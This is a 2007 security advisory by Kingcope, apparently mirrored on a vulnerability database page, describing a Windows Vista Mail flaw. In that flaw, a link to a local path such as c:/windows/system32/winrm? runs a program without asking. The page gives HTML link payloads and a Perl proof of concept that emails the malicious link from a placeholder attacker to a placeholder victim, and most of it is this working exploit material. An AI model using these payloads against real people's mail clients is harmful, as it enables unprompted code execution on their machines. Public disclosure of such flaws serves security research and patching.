Lucene search

K

vista-pwn.txt

🗓️ 24 Mar 2007 00:00:00Reported by KingcopeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Microsoft Windows Vista Mail Client Code Execution Vulnerabilit

Show more
Code
`  
Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability  
Successfully Tested on Windows Vista Ultimate  
  
Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero  
  
Description  
Windows Mail is the default Mail Client of Microsoft Windows Vista.  
  
Vulnerability  
Remote Code Execution is possible if a user clicks on a malicious prepared link.  
Vistas Mail Client will execute any executable file if a folder exists with the same name.  
For example the victim has a folder in C:\ named blah and a batch script named blah.bat  
also in C:\. Now if the victim clicks on a link in the email message with the URL target  
set to C:\blah the batch script is executed without even asking.  
There is for example a CMD script by default in C:\Windows\System32\ named winrm.cmd  
(and also a folder named winrm inside System32).  
  
Exploit:  
Send a HTML email message containing the URL:  
<a href="c:/windows/system32/winrm?">Click here!</a>  
or  
<a href="c:/windows/system32/migwiz?">Click here!</a>  
and winrm.cmd/migwiz.exe gets executed without asking for permission.  
These are just examples.  
  
I could not pass arguments to winrm (hehe this would be beautiful), but I guess there  
are several attack vectors.  
  
Proof of Concept  
---snip---  
use Net::SMTP_auth;  
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);  
  
$smtp->auth('PLAIN', 'username', 'password');  
$smtp->mail("attacker\@attacker.com");  
$smtp->to("victim\@victim.com");  
  
$msg = "Subject: Vista Remote Code Exec\r\n"  
."From: attacker\@attacker.com\r\n"  
."To: victim\@victim.com\r\n"  
."MIME-Version: 1.0\r\n"  
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>";  
$smtp->data();  
$smtp->datasend("$msg\n");  
$smtp->dataend();  
$smtp->quit;  
---snip---  
  
  
Signed,  
  
Kingcope / kingcope[at]gmx.net / 2007  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo